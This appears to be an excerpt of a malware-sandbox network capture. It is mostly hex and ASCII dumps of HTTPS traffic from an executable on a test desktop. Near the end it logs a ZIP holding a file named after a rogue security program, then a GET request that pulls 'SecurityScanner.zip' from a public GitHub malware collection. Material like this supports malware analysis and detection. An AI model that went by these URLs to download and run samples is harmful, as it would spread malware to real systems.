                                                                                                                                                2022-09-29 12:51:55 UTC34333INData Raw: 0b f8 f2 dd ae f9 2f 53 70 33 a2 37 92 f0 b9 21 c9 2f a7 de 5f 2d 1d 97 dc cc 7b bd 79 40 89 b8 56 46 37 c5 cb 40 2f f2 16 db d5 56 61 5c a9 5d 48 ff 0a 65 7a f1 8e a7 0b 4a 4e b2 92 df c6 64 cd 1c a6 47 0d a7 dc 1e 23 d2 0b 23 2f a1 97 16 6b 0c ab 42 b3 d6 e7 34 28 2a 88 e6 4c 63 c3 a9 a9 e0 5f ab 12 69 50 85 5b e0 6f 01 e5 ca f4 34 d2 2c 78 9e 99 da 0c 1b 1b ff c1 6c cc f5 be 5b b4 d4 ba 93 8a 89 d4 c7 fe c4 98 da 84 9b 0d bd 2e 9e 5d 18 0c 1b 8d 46 ea c3 f2 f5 74 2b a0 4c c6 68 19 31 9b 87 c8 cc fc 8a af ea 47 7e 79 1a 32 a6 83 24 1a 3c 3d 94 fe 9a 33 2f db f1 2d af 39 d3 a8 b8 fa e4 8e 08 f2 1a 4d 56 49 8a 4e 00 49 d6 78 0e fe b6 fd 3c b1 35 8b 93 ee 7b 35 66 a5 36 0c 32 51 1f 79 b7 81 e5 d5 13 2a 2f 8a 36 8f 4f 3f e1 61 57 9d 24 27 64 fc da ae fe d2
                                                                                                                                                Data Ascii: /Sp37!/_-{y@VF7@/Va\]HezJNdG##/kB4(*Lc_iP[o4,xl[.]Ft+Lh1G~y2$<=3/-9MVINIx<5{5f62Qy*/6O?aW$'d
                                                                                                                                                2022-09-29 12:51:55 UTC34342INData Raw: c2 b7 4e d4 62 88 06 5e 3d c2 d5 85 fb 2d 86 64 f5 50 0f 6c e6 ea 0b ed 9a d3 d4 31 cf ed 15 3e 46 0a dd cb 76 d8 c4 4a a6 20 f2 4a 59 b4 4f 7b 5a e5 57 d1 cb fa 9c 33 6e 18 65 9f 95 a7 45 20 70 40 7a e6 72 5c 2e ca 76 0d b4 cb a7 d3 3f ed 60 a3 59 f1 b4 81 62 dc 04 46 b6 4a 09 ee 46 f8 38 5d d7 5b d5 b6 77 a1 75 66 3e f3 11 07 53 6e 3a 32 15 55 0e 23 49 3a 8f 8c 07 74 d6 4d ca d1 c3 61 c3 a1 4f ca 25 0e 09 23 ab 00 db 29 f6 b2 f7 d0 7a 4d 7a 1b 26 0f 3b 09 ba 4b 91 cb 9f 3e 4e e8 b0 9f 0e ab 48 95 7a a0 d4 3d 0e ad 36 7d ba a1 b6 49 17 de 7e a5 9e 82 c7 8d 2d 2e 40 ff 22 2b 25 1e 87 57 59 e1 0e a9 ae 7b 7b 3f df c9 c3 50 5e 73 55 94 83 d3 55 3d 8e 90 87 bd a2 0a a0 ed e3 97 f0 74 9c a7 5c 49 d7 fa 6e 1f ff 44 8b 43 ef 3d f5 e4 75 ed 50 d5 55 13 b3 1c b4
                                                                                                                                                Data Ascii: Nb^=-dPl1>FvJ JYO{ZW3neE p@zr\.v?`YbFJF8][wuf>Sn:2U#I:tMaO%#)zMz&;K>NHz=6}I~-.@"+%WY{{?P^sUU=t\InDC=uPU
                                                                                                                                                2022-09-29 12:51:55 UTC34358INData Raw: 4b 3f 7d 82 b6 a1 6f a5 dd bb 27 49 64 b5 8b 3d 19 10 56 1d 27 53 67 a2 df 60 14 cb b9 ed 4b 23 d9 6e b4 1e 30 3f 10 08 45 f6 d6 24 7e 2f a0 48 d2 96 97 41 6d 9f 52 45 5b da c1 d7 06 8c f9 5e 5c c7 93 3f ed 22 0f d1 11 9e 44 99 b0 fa 67 a6 a1 11 51 72 2b d6 4a 0c 8b 18 e9 da e6 4a e2 5e ee bc e9 d7 98 46 43 66 36 43 81 a2 96 14 2a 4c 24 f6 b3 59 af db 2d 82 5b f5 18 af df 24 c6 7e b0 ee b6 54 7a da 50 6e bb 44 d3 b9 5b 60 6b df c0 bf 66 3c 49 f3 fc c0 71 b9 9a 71 63 35 ce 13 3a a3 a6 5c 9c a2 fa 6e 58 3d 41 1f d6 8e bb 51 ff 85 8c d5 06 20 42 62 87 4a 1c 6d 96 ba e1 36 53 46 d4 4a 78 70 f3 e4 f5 23 43 c1 71 60 59 a3 b4 48 bf 97 be f0 0c b3 4b bd 17 20 96 27 0d c5 2e 5b b5 3f e7 0d a0 a1 e2 42 32 52 b5 c1 c9 83 df 93 6e 27 91 27 05 20 be 43 60 d8 c8 d1 c0
                                                                                                                                                Data Ascii: K?}o'Id=V'Sg`K#n0?E$~/HAmRE[^\?"DgQr+JJ^FCf6C*L$Y-[$~TzPnD[`kf<Iqqc5:\nX=AQ BbJm6SFJxp#Cq`YHK '.[?B2Rn'' C`
                                                                                                                                                2022-09-29 12:51:55 UTC34374INData Raw: ec 84 fa b1 46 bc 11 db 72 38 4d 09 98 22 f3 16 e9 49 92 1d de 43 e2 84 16 ed 35 8e 68 3c 41 7b 19 4d c0 fd 59 82 c6 50 06 0b e4 74 5f f0 54 19 e0 51 80 b6 78 43 24 d8 35 e3 a6 03 99 6c ed c6 88 53 7c ad 31 50 38 26 62 5a bd 90 d2 1d 0a 1d cd fc 8e 83 c7 45 0b a3 9c de 7e 2b 85 0c 55 7d ba b0 93 c6 07 ec 04 cb 9e c8 8c 23 f6 d5 38 5e 02 53 ee 8a 22 04 c4 96 dc f3 2f 37 44 82 ef 67 f9 99 f2 22 0d 25 3b e6 1b bc 1d 07 d0 d7 8f 8b 56 1b 7d 99 c1 2b 50 1e ac 5b 97 c8 93 b7 68 32 61 e3 5e a2 d1 3b 2d 36 2a 55 9f 7e 8b 0d 8b 2a 85 49 23 36 55 8f cf a3 07 2d 18 cd 09 83 64 6d ab f7 b5 af a8 b8 b0 1d 13 bc ee 3f 28 82 96 2c 05 79 35 dc c3 16 31 3a 07 c2 f6 8d 27 39 45 89 4b 0f 72 83 23 cc 74 c3 15 3e 18 8f 32 24 7a 40 13 d2 fe 52 93 ad fa 8a e2 77 2a 09 9a 59 39
                                                                                                                                                Data Ascii: Fr8M"IC5h<A{MYPt_TQxC$5lS|1P8&bZE~+U}#8^S"/7Dg"%;V}+P[h2a^;-6*U~*I#6U-dm?(,y51:'9EKr#t>2$z@Rw*Y9
                                                                                                                                                2022-09-29 12:51:55 UTC34390INData Raw: 5e db 14 51 33 32 34 b1 56 15 3c bb ca 07 e8 32 7e 32 41 d8 43 ff 14 75 bb fc 07 78 73 b1 26 7a 75 91 ff 75 9b 1e 7c 8a df 0b 58 22 37 0f e8 5f 8d 4c b6 ae 3e 21 8f 72 e1 0a 1b a4 aa 63 4d 1a 21 27 40 58 a1 2f 4e c6 b2 44 df 3f f1 c3 5c 10 62 48 88 8a df eb 70 46 06 9b 0e 82 f7 36 9f 61 40 86 99 60 1e ec de d5 e1 97 8f 82 d8 45 78 01 89 9b 3e 20 c4 2c f4 63 54 39 dd 0f 75 1d 69 f1 6d f8 3e b1 da 64 61 8a 70 f2 7a 11 df c6 b5 b6 df 2b a5 41 3c 9f bb a9 f2 cc 16 4a b8 e8 47 2e 4c 1c a7 55 5e 08 5e 3b 75 85 36 57 31 d2 80 5a 02 ce dd 52 48 61 12 7d 55 55 ad f2 3b a4 08 5d 97 e4 1c 72 42 37 28 ea 86 52 72 35 fa 86 8e 77 32 88 84 c0 d0 bf bd e9 bb 28 48 2b f9 5f b2 a2 8e 0a 0e f7 6c 0e b9 bb 47 bb d4 25 70 af db a1 73 86 e2 77 ab ac 21 67 ce 6e 5b 10 18 2e 02
                                                                                                                                                Data Ascii: ^Q324V<2~2ACuxs&zuu|X"7_L>!rcM!'@X/ND?\bHpF6a@`Ex> ,cT9uim>dapz+A<JG.LU^^;u6W1ZRHa}UU;]rB7(Rr5w2(H+_lG%psw!gn[.
                                                                                                                                                2022-09-29 12:51:55 UTC34406INData Raw: 61 34 03 f0 81 c4 e3 3a b2 11 4f 5c e2 8a bc 01 b9 27 79 fa a7 de 29 a4 98 1e f7 73 88 92 3b 79 1e 08 e2 78 7e f1 a9 80 61 e3 76 37 df c4 55 3a 44 ef a9 7d fe 49 26 8a 0d 88 04 45 b7 87 6a c9 fc bf b1 70 15 b2 33 d6 d0 da 27 71 51 e8 22 47 c8 94 9b 4d 4d f1 00 fe 32 00 ef be c2 6a d8 26 b1 49 9f ef ae 29 a2 85 a5 76 55 72 d6 1e 6a 5f 6c 90 fc 6f 2d 44 dc 57 cf 99 7a 3f 42 48 89 10 63 d5 13 36 3b 42 4d 32 a3 88 7d c2 2f b2 3a 9b e6 dc d4 61 98 45 6d 62 f0 9c 58 1a 76 83 ec 60 9d 04 c0 e8 f6 59 20 b1 ea b6 38 cc 72 6f 1a 08 b9 e1 61 a8 2d c6 de 85 24 86 06 b0 fb 71 37 89 51 77 ee 06 1c 57 2f 2f 46 a3 bf 3e 9d 5e 8c 7c 04 6f 4b 33 d1 ad 94 ae 80 2b ff 32 f6 1e e5 e9 92 7e 52 99 64 08 09 37 48 4f 95 3d 2d fd 5f 8a a6 65 fb d6 61 35 38 97 09 b3 da ff d8 d7 91
                                                                                                                                                Data Ascii: a4:O\'y)s;yx~av7U:D}I&Ejp3'qQ"GMM2j&I)vUrj_lo-DWz?BHc6;BM2}/:aEmbXv`Y 8roa-$q7QwW//F>^|oK3+2~Rd7HO=-_ea58
                                                                                                                                                2022-09-29 12:51:55 UTC34422INData Raw: c3 66 fe 56 38 fe 9c da 1a 7b de 3f 15 93 fb 17 99 f6 f5 92 cd 3f 86 f8 4e 75 e9 81 23 48 3f 61 63 53 ef 51 fe d2 50 1e de 95 e7 24 96 62 10 97 f5 c4 e3 dd 28 ad 7f 55 b6 11 5d 6d f5 c1 a3 47 50 d2 29 6a a7 9f 93 b3 b7 53 3e 3c 6a 9f 16 ad c0 60 58 fc 19 10 d5 49 ea 31 5e 4d d3 44 15 3f 35 4b 7e 10 91 5b 26 ac e3 89 68 c4 d6 d4 16 a8 37 5a fb fb 22 f4 27 26 ac f0 43 a4 07 b9 c9 4b ad db 89 c9 8f 5a 89 5d 4d 22 1b 7d 7d 82 10 44 b5 d2 cc a9 e4 2f a9 2e f7 9e 69 6c 77 9f 09 f9 30 dc dd 70 e6 45 94 a5 5e 10 1d 19 4f fd e5 75 e0 bb aa 88 19 19 e2 f7 02 27 6d 81 7d 5d 0f 35 15 ee f6 b8 c4 19 c9 68 20 3a 3b e4 05 0f 88 f3 86 3b 5b 2f 26 cf 7a 9f 41 db 00 69 46 e0 9b 45 e2 e4 fe 47 41 0c 2e 67 84 46 cb ff 19 a7 a1 57 04 1d 20 fc 79 96 82 e9 59 1f ad 05 31 78 08
                                                                                                                                                Data Ascii: fV8{??Nu#H?acSQP$b(U]mGP)jS><j`XI1^MD?5K~[&h7Z"'&CKZ]M"}}D/.ilw0pE^Ou'm}]5h :;;[/&zAiFEGA.gFW yY1x
                                                                                                                                                2022-09-29 12:51:55 UTC34438INData Raw: 40 5b 3f 11 1a ac 2a 6e 76 47 b7 1b 35 be 85 2e 11 b1 91 f1 13 a0 cd b5 21 97 c3 a7 ef bb da f3 18 51 3e d5 9a 52 2d 46 f1 ca 6a fd 94 ce 87 95 1e 75 cf ee 19 8f 0d ea ef 8c 09 f3 e9 1d 2f 87 55 e4 a7 ff 99 04 ad bf 1c 1a 29 71 0a d2 09 f7 c0 53 95 9e d0 6a 79 ec 92 73 ef 92 4b 50 af 63 18 01 d6 96 c7 de f2 3f 7c 2b 15 9c c1 0c dd 44 65 8f a7 e7 2c 7d bb 2a b4 71 e9 be 8d 91 89 81 20 52 f2 d8 fe ae 42 36 7a ba 99 5d 9a 94 d6 cc 60 49 cc 82 d9 e9 e2 f2 63 6d b9 84 3c 2f 69 30 8d f4 a6 f5 0e 4f 5b 21 76 63 2c b3 26 eb 34 9f 7b 9e 8d 26 3b 1b 6d 9c 20 3e e4 1b ed 19 fe 3a c6 7e c7 21 df 5d e5 c8 3f 4f 69 eb 1c 04 34 d7 7f 0f 08 f8 dd 11 42 44 15 fb f9 6d 97 78 81 73 2f 20 4d 2c a0 76 2d e3 7b df 66 9f ca b9 b7 62 39 f5 d6 4c 7c fa 76 4b 28 0a 2b 47 e6 b2 79
                                                                                                                                                Data Ascii: @[?*nvG5.!Q>R-Fju/U)qSjysKPc?|+De,}*q RB6z]`Icm</i0O[!vc,&4{&;m >:~!]?Oi4BDmxs/ M,v-{fb9L|vK(+Gy
                                                                                                                                                2022-09-29 12:51:55 UTC34454INData Raw: e8 14 0e b7 ce d8 24 04 fc 73 5a 97 d3 e7 c1 6a 31 b9 56 50 1b 20 82 c2 0e 36 7d 50 af 1f 5c 74 af 17 e0 1c f0 18 1d b7 a4 66 d4 e1 4e d3 15 c5 6d f3 f3 96 c2 98 bc ed 76 0c d2 1c 74 38 5f 61 9d db bd 02 96 f9 2e f9 22 78 e2 9e c9 eb b3 47 9c 2b 0e ae 93 da 2c 69 55 0b d9 8c 01 f6 a5 d0 93 41 df b2 ef b0 fa 3a 13 d7 64 94 fc b1 41 b5 0a ed 65 3a 83 63 e1 a4 78 d0 9f a4 f6 38 f0 70 2b 5b b4 21 5a ce 60 9d bb ed de e0 69 73 b4 c7 ef 43 ce 2e 73 94 9c fc 1d fd 84 c7 a6 b3 49 01 f5 89 7d 60 5a a2 78 b1 54 6e c7 06 02 a4 ba ed 06 1b a4 2f 16 a2 da 2d 4b 06 76 25 4f 10 08 5d 2e b7 6b 57 56 8d 2c 11 57 c0 97 bd d7 49 3e 68 6e e9 f1 0f 0e 42 dd 95 6d 6a 5d f3 8e d3 04 3c df 73 91 90 8e d0 4b 2b 99 8a 5e 06 26 d5 3b bb d5 bc d3 95 f0 db 7f e1 6d 71 fa 05 90 5b e7
                                                                                                                                                Data Ascii: $sZj1VP 6}P\tfNmvt8_a."xG+,iUA:dAe:cx8p+[!Z`isC.sI}`ZxTn/-Kv%O].kWV,WI>hnBmj]<sK+^&;mq[
                                                                                                                                                2022-09-29 12:51:55 UTC34470INData Raw: 36 e6 ed 88 18 d9 c3 43 a7 5b 2c 7f dc c1 f4 13 a3 f5 22 51 c5 11 b7 3a a5 50 44 3a d6 de 3b 37 13 57 cc 13 89 a6 36 cd fa df dc bd 76 e8 b3 cb 5e 80 94 19 3c 12 5e 40 f2 95 bb 25 54 84 93 42 2f 92 f0 a6 2e 21 f4 4e ea 9f da e7 c7 f1 50 46 2b 60 b6 ad 6d b7 1a 02 6b 46 c4 86 25 14 32 02 72 16 1f 94 3f e1 fa f2 a8 77 9b 84 ee e4 39 2f 8a 27 dc 48 df 97 1b 56 14 49 63 0c cb dd 5e e1 9e 50 f0 b0 d9 c3 e4 b5 0f c6 91 5b 38 d7 7c 3b 86 61 07 26 a8 9a bf eb 2a 58 a1 5b 22 b4 63 3d cb 48 93 2f d5 6f a7 0f 32 b4 10 ad 6e fc 7f 86 39 38 52 b2 a9 ba 85 e6 4f bd d7 a7 d6 8e f0 dd d7 4d f2 72 f4 a3 f1 6a d3 04 20 6a 30 ad f5 19 59 76 6d da fb 74 2d 54 cd 74 c7 38 01 9c dc 25 84 6a bd 7e 09 fb c7 00 98 88 5a 5f 1b ae b5 18 e7 16 87 ca bd 21 99 ea 23 ba 18 fa ef b9 25
                                                                                                                                                Data Ascii: 6C[,"Q:PD:;7W6v^<^@%TB/.!NPF+`mkF%2r?w9/'HVIc^P[8|;a&*X["c=H/o2n98ROMrj j0Yvmt-Tt8%j~Z_!#%
                                                                                                                                                2022-09-29 12:51:55 UTC34486INData Raw: 42 d0 44 e3 e6 72 e4 6c bb c0 e5 13 f0 1d 02 a7 64 02 96 90 1a 91 ca 77 e0 cf 4a 48 64 fa 45 fa c0 28 4b 5a 4f 68 42 25 1e 2e 29 12 ee 9a 36 b2 1f fb 3a a5 c6 6a 89 f8 9b 02 d0 b2 17 0d b7 9f b5 b4 72 86 25 60 b8 e2 34 76 d8 e6 9d 52 24 30 d1 e1 b5 5a 99 8e 0b 61 4a 00 08 af 79 71 18 f1 0a 9d 48 7e 69 3e 2d 83 94 c2 dd 40 a1 bc d2 19 f7 1d 49 55 94 6c 67 64 4b 09 f0 67 0f ca 7d ec 29 e0 58 25 df c4 96 68 12 81 67 6d 98 ae 27 ad 5d 5d c3 10 3c 3c b1 37 07 45 60 71 11 f6 8b 68 d9 e9 57 a2 c8 db 7e 29 43 1d 83 43 a7 6c 1e f4 0a 32 ee a1 cd 59 d1 ed 74 0f f8 bc 23 b6 ec 74 0c 71 a1 38 9d 10 4d d3 8a 3e a3 0b c9 dd 91 d6 2e fb 2c 32 b2 a0 07 3e c3 d8 df 52 ef 8c df 54 28 3c 7d 31 52 f0 17 91 2b 18 d2 81 0a 52 e2 8c 7b 16 af 9e c2 7b f9 24 36 55 09 01 86 c9 61
                                                                                                                                                Data Ascii: BDrldwJHdE(KZOhB%.)6:jr%`4vR$0ZaJyqH~i>-@IUlgdKg})X%hgm']]<<7E`qhW~)CCl2Yt#tq8M>.,2>RT(<}1R+R{{$6Ua
                                                                                                                                                2022-09-29 12:51:55 UTC34502INData Raw: 40 10 75 0c e6 cd ba 1b fc 2f f7 f5 59 39 98 e5 64 76 86 a1 b8 ce 88 a3 ff f2 75 86 f0 70 d0 8e 4f 45 69 e6 56 57 6c eb 18 01 cc 19 35 f4 cd ef cc f4 81 77 94 a5 3e 90 c9 21 50 52 40 8a 63 73 e4 7e 73 ca 42 20 a7 b6 ac 1a 90 98 8e a7 a2 82 ae e0 9d 9f 76 f0 6a 2a 69 5c 7c fb 94 f3 0b bc d0 a6 70 c5 be 98 1f 0a c0 d8 be 85 79 58 1b 00 f4 6f e1 12 ec 98 6e a6 06 4d ee b8 df f9 c2 a1 ce ac 25 50 85 bc bc 80 2b 3f cf 20 e2 cc 9e e5 38 9d 28 06 e2 d3 07 a9 0c 8f 8c 81 a6 be 05 fd f1 4a 60 62 f7 56 ad a9 70 97 84 aa 05 8f f3 72 33 0a f8 ae 07 80 14 9b 41 fd f6 c9 c5 68 9c 80 46 f1 e2 83 b8 7d 50 33 dd dc 3f 24 a3 d4 fb 44 32 64 87 10 e1 ee 2c 25 64 b4 04 ee d3 a7 98 fa 4d 97 6c 97 7a 4d 16 bb 99 61 0e f2 4b d5 dc ed a4 fe a9 7d e2 2f 94 c6 b3 6d e4 cb ff 52 e6
                                                                                                                                                Data Ascii: @u/Y9dvupOEiVWl5w>!PR@cs~sB vj*i\|pyXonM%P+? 8(J`bVpr3AhF}P3?$D2d,%dMlzMaK}/mR
                                                                                                                                                2022-09-29 12:51:55 UTC34518INData Raw: b5 36 32 a2 73 7c 0f 50 6f 8f 8a 9a 31 0b e3 cf 5d d2 3c b1 6e 7d 30 76 24 03 58 c0 8f 29 49 c1 69 cb ec 81 16 88 9f bd 78 eb f3 cc 16 dc b8 da 04 31 fc 40 04 82 bf d4 d1 1b 82 01 66 b4 f3 7f e5 c6 2e 74 5b 2e 7a 10 f1 73 8b c4 e6 c3 73 07 67 05 2f bc 7a 63 69 2e cd b5 45 90 d4 06 e1 9d ff 78 b3 2a fe 62 00 1d 0b 1d 71 a8 0c e1 44 a5 59 72 ec b1 cc dd a7 55 92 fd 25 e4 9c 0e 6b fd 5c d6 f1 c0 0e 28 6c 4e 38 59 1c 21 3a 0b 7a b0 69 5a 80 63 b8 a1 a4 68 12 ac 8e 01 72 45 fa a9 7c 4f 91 b5 23 d6 ca 35 4e 18 25 92 c1 82 be 2f bc 83 9a 46 ff b5 2b 0b 8c a0 00 2e 12 6b 62 3c d4 fe 54 22 50 3b 9e 70 1b dd d9 f7 b8 a6 ce 04 0f b1 5f ec 7f c0 ac 16 a0 61 8a 80 29 75 82 f2 50 34 fe e2 2c 1c 50 91 e8 ce 21 88 c4 da e3 a0 3c 84 8a 54 82 d3 cb 9e 06 bb 4f 45 d0 65 b3
                                                                                                                                                Data Ascii: 62s|Po1]<n}0v$X)Iix1@f.t[.zssg/zci.Ex*bqDYrU%k\(lN8Y!:ziZchrE|O#5N%/F+.kb<T"P;p_a)uP4,P!<TOEe
                                                                                                                                                2022-09-29 12:51:55 UTC34534INData Raw: 78 4e f5 78 6d e4 ee 04 d2 0d b9 32 ad 19 b6 72 9f 29 03 ea 82 0e 49 1a 0f 55 56 2b 7e 0a f9 08 9e af 4b 00 bd 47 5a c2 5e 78 c1 ac 99 c1 ca c6 7c 41 f5 91 7f 97 69 0a ec 11 92 50 83 97 74 99 c9 fd c3 b8 7a 4c e4 0f 95 af af 3f 4c 4c 2e f9 35 47 f3 0b 34 8b 9b 88 07 15 93 0a 05 ec 3f 3f 96 e1 14 3b 69 b3 c4 94 3f e2 82 57 47 c8 6b 66 98 28 83 b2 cf 69 2b be 1a ca 9b 6e f5 b3 be 8c 75 e8 18 32 cf 18 f6 ae 2a bd c0 5d b2 3b 41 c9 c6 90 f4 4d 72 0d 15 63 ba c3 85 e9 40 fb 27 b5 37 65 1e 3c 3f 7a ed 7a cb 46 3e a8 2e e7 5d 0b 34 4c 9b cc 6b 9a ce 64 15 94 1a 4a 82 5b 29 fc 3c b4 72 5f b6 f3 90 e3 a8 18 37 d5 1d 6b 6d 43 5d 5a 28 2e 28 ea 5f 41 ae 3f 7b ae 18 f3 98 54 00 53 18 05 26 ba 96 00 7f d3 73 58 ca 1e 1f be 9e f5 96 da a4 26 6e 77 a6 b3 3c f0 36 64 b2
                                                                                                                                                Data Ascii: xNxm2r)IUV+~KGZ^x|AiPtzL?LL.5G4??;i?WGkf(i+nu2*];AMrc@'7e<?zzF>.]4LkdJ[)<r_7kmC]Z(.(_A?{TS&sX&nw<6d
                                                                                                                                                2022-09-29 12:51:55 UTC34550INData Raw: 24 3b 26 74 b3 a0 a0 a5 97 cc 9e b6 7a 66 0b a2 df 9d 94 97 7c 7a 9b ef 28 fe c6 67 4e ed 86 bf a5 1a d9 ba c5 5e 95 c4 2e b3 ab 13 2b 18 a0 2f 67 41 cc 49 9e ec 31 3d ca 19 5c 43 03 76 8d ad 77 78 39 0f 00 11 c0 1e 62 29 f0 2b cd 92 2a d3 9d f4 49 e9 7f d6 e7 d8 76 c2 eb 14 e4 4d d7 94 89 49 f6 31 29 4f 29 62 c5 dd 6a 82 78 4b ab 74 0c 57 ee cb 77 11 6e fa 03 02 46 a7 be 0b 09 70 2b a2 5d 6f 13 d7 8b 83 3d 0b 5c 09 b7 d5 2c 58 21 0b 81 19 63 4a 73 32 35 88 b7 70 7b 4b 43 d9 90 5d e1 96 ce 66 fc 23 89 f5 6e 3a 59 74 63 eb 5b 27 43 84 9f 1e 5c 73 8d b8 8d 2d 52 41 26 32 7e a9 22 a1 15 f1 16 0a 9c 35 aa 2c a9 bb ef 1d 12 36 64 88 9a 86 7c 14 67 64 ae dc e3 52 b0 a6 09 8b 59 64 0d 03 89 77 d3 ed d5 35 75 ae 92 f1 aa d0 cb 9e a4 27 71 ad 86 03 57 a3 74 54 a5
                                                                                                                                                Data Ascii: $;&tzf|z(gN^.+/gAI1=\Cvwx9b)+*IvMI1)O)bjxKtWwnFp+]o=\,X!cJs25p{KC]f#n:Ytc['C\s-RA&2~"5,6d|gdRYdw5u'qWtT
                                                                                                                                                2022-09-29 12:51:56 UTC34566INData Raw: de db 08 a7 89 1c 62 bd aa eb 3e eb ea a4 a5 f0 b7 96 2c a2 c7 d1 47 f0 27 64 60 b5 23 c1 a5 86 04 a9 ad ea 48 93 ff 0e 35 38 a8 78 61 d6 17 4f 86 05 a5 14 52 eb 52 6e 00 b3 e6 e7 66 d2 05 f7 f8 c6 a5 3f 9f 83 90 bd cb 12 fc 23 6b a9 33 1d f0 79 91 ba d5 d0 44 a3 9a 18 24 d8 8c bd 1e 1d a9 ba 95 98 3b e6 5b 85 51 e2 46 d2 3b 38 db b5 d8 f6 39 df 89 c3 91 41 85 2b d2 50 29 2a 14 c2 ef 4b 3a b8 53 dc 26 34 4a ef 5a 10 18 f6 28 53 6f 8c f7 92 bc 61 a3 9d f0 7d 88 6d a5 92 4b 21 bd 83 05 9a ef 43 be 29 77 92 d6 7c 48 a0 39 b0 c4 c2 05 59 2d 83 83 14 4c 9e bc c2 f0 83 88 f5 a8 f6 57 76 5d f4 65 cc 8b e7 72 c1 19 1e 57 32 fd a7 63 0f ee cb 56 fc b9 50 5e 48 53 5f 1a 70 d1 12 9b 94 0c ee ce a6 eb 0c 3d 56 f3 5c d3 66 f3 5e 77 8a b4 18 74 3c 71 cd a4 6c 01 6f 25
                                                                                                                                                Data Ascii: b>,G'd`#H58xaORRnf?#k3yD$;[QF;89A+P)*K:S&4JZ(Soa}mK!C)w|H9Y-LWv]erW2cVP^HS_p=V\f^wt<qlo%
                                                                                                                                                2022-09-29 12:51:56 UTC34582INData Raw: da b2 ca 8e 4e 2a 8c f4 78 e8 25 52 a6 4f 60 2e 63 7c f8 90 d4 8d ed 13 be 9d 1f 38 49 c7 62 7a 4f 13 17 02 b7 43 8e 50 26 98 e1 14 43 5d df f4 78 dc 5a 00 21 17 a2 9e 8c ff 68 25 b5 f9 e2 d2 3c 94 03 4b 5b d9 09 f4 9d 16 b1 14 34 d1 04 50 b2 c9 59 8a 9a 89 7d 01 19 9f 4e 96 f5 da a3 b1 1d f1 db 41 da 84 11 4c c0 f0 9e 9d 76 c6 9e ce cd 24 c6 89 25 89 67 71 54 34 18 d0 2e 14 14 9b 98 df 9f a4 a3 7a 15 43 fb 0d 1a 20 93 c5 d6 3f 26 85 fb 56 42 a4 cb 2f 49 a9 d1 2f 9d 9f fe 12 0f 09 66 82 79 c2 3d 0c dd b4 c2 a6 1b 30 3f 7a ae 3f b2 ad 1e 35 38 3e b8 75 7d ea 04 e4 87 03 b3 fc 1d 65 f7 04 bf 3e 34 04 34 8d 21 5f 42 7a 60 d4 99 91 a8 ae c8 36 33 c9 03 4d f5 65 71 11 f1 2d 3e 3c e6 95 95 02 ed 56 da 70 8d 51 ec 64 58 01 0a 9e c0 34 ba 9f 04 8a 4b 61 82 17 6f
                                                                                                                                                Data Ascii: N*x%RO`.c|8IbzOCP&C]xZ!h%<K[4PY}NALv$%gqT4.zC ?&VB/I/fy=0?z?58>u}e>44!_Bz`63Meq-><VpQdX4Kao
                                                                                                                                                2022-09-29 12:51:56 UTC34592INData Raw: d4 91 f4 44 49 ad 8c 5d 9c 31 87 85 df a0 9a 50 4b 01 02 3f 00 33 00 01 00 63 00 66 ab 98 43 00 00 00 00 51 92 22 00 00 76 26 00 15 00 2f 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 45 32 30 31 31 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 00 80 33 c3 d5 00 cf 01 0f ac 21 3e e9 3a d4 01 0f ac 21 3e e9 3a d4 01 01 99 07 00 02 00 41 45 03 08 00 50 4b 05 06 00 00 00 00 01 00 01 00 72 00 00 00 8f 92 22 00 00 00
                                                                                                                                                Data Ascii: DI]1PK?3cfCQ"v&/ Endermanch@SE2011.exe 3!>:!>:AEPKr"


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                62192.168.2.549763140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:57 UTC34592OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:57 UTC34593INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:57 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:57 UTC34593INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


